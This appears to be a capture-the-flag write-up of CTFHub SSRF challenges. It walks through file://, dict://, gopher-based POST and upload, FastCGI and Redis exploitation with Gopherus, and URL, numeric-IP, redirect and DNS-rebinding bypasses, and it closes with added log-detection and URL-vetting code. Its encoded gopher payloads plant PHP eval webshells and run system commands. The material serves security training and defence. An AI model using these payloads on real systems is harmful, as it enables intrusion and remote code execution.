CTFHub Web SSRF Exercises


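Basics

Internal network access

Challenge description: try to access flag.php located at 127.0.0.1.

Visiting the target address shows that /?url=_ has been appended to the URL.
Then request 127.0.0.1/flag.php through that parameter:

Payload: ?url=127.0.0.1/flag.php

Source code of this challenge: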

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

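Reading files with pseudo-protocols

Challenge description: try to read flag.php in the web directory.

The pseudo-protocol most commonly used in SSRF is file:///, which can be used in SSRF to read PHP source code.
Source code of this challenge (index.php):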

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

Payload: ?url=file:///var/www/html/flag.php

Then view the page source.

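Port scanning

Challenge description: come on, sexy CTFHub scans ports online; rumor has it the port range is 8000-9000.

In SSRF, the dict protocol can be used to probe for open ports.

Payload: ?url=dict://127.0.0.1:8000

Use Burp Suite to brute-force the port number.
The hint says the port number is in the range 8000-9000.

The response length for port 8566 differs from that of the other ports.
Then access port 8566:

Payload: ?url=127.0.0.1:8566

Source code of this challenge: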

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

header("Tips: Port = [8000,9000)");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

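Exploiting the Gopher protocol

POST request

Challenge description: this time you have to send an HTTP POST request. By the way, the SSRF is implemented with PHP's curl and follows 302 redirects. Go for it, young man.

Following the hint, capture the traffic and request 302.php: nothing is served there.

Try accessing flag.php.
Accessing flag.php from the internal side reveals key=e42236c6f932a86af6eaa1f0ca77e0de

?url=127.0.0.1/flag.php

We need to use the gopher protocol to POST the key to flag.php; note that the data has to be sent from 127.0.0.1. Usage: gopher://ip:port/_payload
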
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
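# Note: the Content-Length value must match the length of your POST data

URL-encode the request, three rounds of URL encoding in total (note: after the first round, manually add %0D in front of every %0A, then do the remaining rounds):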

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de

Build the payload:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de

This returns the flag.
A script that builds the POST request for the gopher protocol:

import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
"""  
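# Note: the payload must end with a newline; the trailing newline marks the end of the HTTP request
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # URL-encoded twice because it is sent as a GET parameter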

Output:

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253De42236c6f932a86af6eaa1f0ca77e0de%250D%250A

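File upload

Reference: https://www.jianshu.com/p/a9e5a64b733b

Challenge description: this time you need to upload a file to flag.php. Good luck.

The target address shows a blank page. Accessing flag.php directly returns a message that it must be viewed from the local machine.
Access flag.php locally from the target machine:

?url=127.0.0.1/flag.php

This returns the file upload page.

Use the pseudo-protocol to read the source of flag.php:

Payload: ?url=file:///var/www/html/flag.php

flag.php
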
<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

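The code checks whether the uploaded file is empty, so upload a non-empty file. The page has no submit button; add one manually in the browser developer tools (F12):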

<input type="submit" name="submit" >

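Upload a file and intercept the request with Burp Suite.
Change the Host value to 127.0.0.1:80, URL-encode the captured request once, replace %0A with %0D%0A, then URL-encode it two more times. Do it with the script: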

import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------92335795416210780092655892737
Content-Length: 395
Origin: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php 
    @eval($_POST["pass"]);
?> 
-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="submit"

提交查询
-----------------------------92335795416210780092655892737--
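"""  # Note: the payload must end with a newline; the trailing newline marks the end of the HTTP request
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # URL-encoded twice because it is sent as a GET parameter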

The script prints the encoded gopher URL.


Pass it in the url parameter to get the flag.

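FastCGI protocol

Challenge description: this time we need to attack the FastCGI protocol. The attached article may be of some help.

Gopherus tool: https://github.com/tarunkant/Gopherus.git
Reference: https://blog.csdn.net/mysteryflower/article/details/94386461

If port 9000 is open, the SSRF vulnerability may exist and may lead to RCE. To exploit it, you need to supply the name of a file that must exist on the target host (preferably a .php file).

?url=file:///var/www/html/index.php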

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

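/var/www/html/index.php exists on the target server.

Prepare a one-line webshell, <?php @eval($_POST['x']);?>, and save it in the file tmp.php.

Construct the terminal command to run: it decodes the Base64-encoded webshell and writes it to a file named shell.php.

echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Use the Gopherus tool to generate the payload: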

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit fastcgi

  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /var/www/html/index.php
Terminal command to run:  echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Your gopher link is ready to do SSRF: 

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH119%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00w%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg%3D%3D%22%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------

URL-encode it once more and pass it in the url parameter.


shell.php has now been written to /var/www/html on the server.

/shell.php

x=system('cat /flag_bb4ae17f50829d327b60b4f752bc438d');

ctfhub{e028c80e91de1a8e7220d506}

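Redis protocol

This time, attack the Redis protocol. redis://127.0.0.1:6379. Documentation? There is none! Find it yourself!

Summary of Redis vulnerabilities: https://www.freebuf.com/articles/web/249238.html

These mainly exploit unauthenticated access to Redis, for example: writing an SSH public key (generated with ssh-keygen) for login, getting a reverse shell through a scheduled task, writing a webshell directly, or getting a shell through master-slave replication.

Method 1: by hand

First use the dict protocol to check whether Redis is on port 6379:
url=dict://127.0.0.1:6379

Check whether authentication is required:
url=dict://127.0.0.1:6379/info

It is there. Next, set the local directory where the dump is stored:
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html

Then write the webshell, usually hex-encoded: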
url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php @eval($_POST[a]);?>

url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php eval($_POST[a]);?>


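Set the file name:
url=dict://127.0.0.1:6379/set:dbfilename:atkx.php

Finally, save:
url=dict://127.0.0.1:6379/save

This does not seem to work for this challenge; I could never reproduce it, whereas both methods work on ctfshow web360.

Method 2: use the tool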

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[atkx]); ?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Batkx%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. 

-----------Made-by-SpyD3r-----------

URL-encode it once more.


Connect to the webshell:

/shell.php

atkx=system('cat /flag_56381dbdb8879c071fdbd8b47e044436');

ctfhub{3f364bbf61aa400455122885}
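
The requests in the Gopher, FastCGI and Redis sections all reach the server in the url parameter, some behind extra rounds of percent-encoding. The following added example (not part of the original post) is detection logic for web access logs: it decodes the parameter until it stops changing and reports every fetch target whose scheme is not http or https. The log lines and the names fully_decode and suspicious_requests are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines for the demo (not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?url=http://example.com/a.png HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?url=dict://127.0.0.1:8000 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?url=%67%6f%70%68%65%72%3a%2f%2f127.0.0.1%3a6379/_%252A1 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?url=file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fflag.php HTTP/1.1" 200 90
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ALLOWED_SCHEMES = {"http", "https"}


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def suspicious_requests(log_text, param="url"):
    """Return (client, scheme, decode_rounds) for each fetch target with a non-HTTP scheme."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        # Split the raw query by hand so the value is still encoded as it arrived.
        for pair in urlsplit(target).query.split("&"):
            name, _, value = pair.partition("=")
            if name != param:
                continue
            decoded, rounds = fully_decode(value)
            scheme = urlsplit(decoded).scheme.lower()
            if scheme and scheme not in ALLOWED_SCHEMES:
                hits.append((client, scheme, rounds))
    return hits


if __name__ == "__main__":
    for client, scheme, rounds in suspicious_requests(SAMPLE_LOG):
        print(f"{client} requested a {scheme}:// target ({rounds} decoding round(s))")
```

A target that needs more than one decoding round is a useful signal in its own right, since ordinary clients do not encode the scheme of a URL they pass as a parameter.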

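Bypass

URL Bypass

The requested URL must contain http://notfound.ctfhub.com. Try to use some of the special features of URLs to get around this restriction.

Methods:

1. Bypass using ?: url=https://www.baidu.com?www.xxxx.me
2. Bypass using @: url=https://www.baidu.com@www.xxxx.me
3. Bypass using slashes and backslashes
4. Bypass using #: url=https://www.baidu.com#www.xxxx.me
5. Bypass using subdomains
6. Bypass using malformed URLs
7. Bypass using a redirecting IP

The challenge requires: url must startwith "http://notfound.ctfhub.com"
We can use @ to get around this. For example, http://whoami@127.0.0.1 actually connects to the site 127.0.0.1 with the user name whoami, so a request to http://notfound.ctfhub.com@127.0.0.1 is the same as a request to http://127.0.0.1: both return the content served by 127.0.0.1.

So build the URL directly and get the flag.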

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

ctfhub{b808a23b0267eb37a9cf2d47}

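Numeric IP Bypass

This time 127 and 172 are banned, and dotted-decimal IP addresses cannot be used. But we still have to reach 127.0.0.1. What can we do?

?url=http://127.0.0.1/flag.php
127 is banned, so bypass the filter with a different number base:

127.0.0.1

Decimal: 2130706433
Hexadecimal: 0x7F000001

Payload: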

?url=http://2130706433/flag.php
?url=http://0x7F000001/flag.php

ctfhub{6c7da22b915e514a2166ebc8}

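302 Redirect Bypass

An important point about SSRF is that the request may follow 302 redirects. Try to use this to bypass the IP check and reach flag.php at 127.0.0.1.

I have no VPS, so I started a target machine on BUU and created ssrf.php in /var/www/html: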

<?php 
header("Location: http://127.0.0.1/flag.php");
?>

Then put the address of that file in the payload:

?url=http://challenge-ecc5d8e674ef2aa4.sandbox.ctfhub.com:10800/?url=http://54899ba5-ce14-4afa-a744-c342f2cc5361.node4.buuoj.cn:81/ssrf.php

ctfhub{44d10798e3a02163751e39ee}

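DNS Rebinding Bypass

Register an account at http://ceye.io/ and you will be assigned a domain. Change the settings as follows: fill in anything for the first entry, and for the second write

A brief discussion of DNS rebinding vulnerabilities: https://zhuanlan.zhihu.com/p/89426041

Configure it.
Then use the domain:

Payload: url=http://r.xxxxxx/flag.php
# xxx is the domain assigned to you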

ctfhub{89904fb53a36e3df04691243}
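
The four bypasses in this section (user@host, numeric IP forms, 302 redirects and DNS rebinding) all defeat checks that match on the URL string. As an added example, not code from the original post or from CTFHub, here is a server-side check that works on the parsed host and the resolved address instead, re-checks every redirect hop, and connects to the address it checked. resolve and send are hypothetical injected functions so that the example runs offline.

```python
import ipaddress
import re
from urllib.parse import urljoin, urlsplit

_NUM = re.compile(r"0x[0-9a-f]+|[0-9]+", re.I)


def legacy_ipv4(host):
    """Read host as inet_aton would (1-4 parts; decimal, hex or octal); None if it is a name."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_NUM.fullmatch(p) for p in parts):
        return None
    try:
        nums = [int(p, 16) if p[:2].lower() == "0x" else
                int(p, 8) if len(p) > 1 and p[0] == "0" else int(p) for p in parts]
    except ValueError:  # e.g. "08" is not valid octal
        return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    for i, n in enumerate(head):
        last += n << (8 * (3 - i))
    return ipaddress.IPv4Address(last)


def vet(url, resolve):
    """Return the IP to connect to or raise ValueError; resolve(name) -> IP strings (hypothetical)."""
    parts = urlsplit(url)
    host = parts.hostname  # text after any user@, so notfound.ctfhub.com@127.0.0.1 -> 127.0.0.1
    if parts.scheme not in ("http", "https") or not host:
        raise ValueError(f"scheme or host not allowed: {url}")
    literal = legacy_ipv4(host)
    ips = [literal] if literal is not None else [ipaddress.ip_address(a) for a in resolve(host)]
    bad = [ip for ip in ips if not ip.is_global]
    if bad or not ips:
        raise ValueError(f"{host} maps to a non-public or unknown address: {bad}")
    return str(ips[0])


def fetch(url, resolve, send, max_hops=3):
    """Follow redirects by hand: vet every hop and dial the vetted IP, never a second lookup.

    send(ip, url) -> (status, location, body) is a hypothetical transport that connects to ip.
    """
    for _ in range(max_hops + 1):
        ip = vet(url, resolve)
        status, location, body = send(ip, url)
        if status not in (301, 302, 303, 307, 308):
            return body
        url = urljoin(url, location)
    raise ValueError("too many redirects")
```

In the PHP source shown on this page, the scheme restriction corresponds to setting CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS to CURLPROTO_HTTP | CURLPROTO_HTTPS. The address check still has to run on every hop, which means turning off CURLOPT_FOLLOWLOCATION and following redirects in application code.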
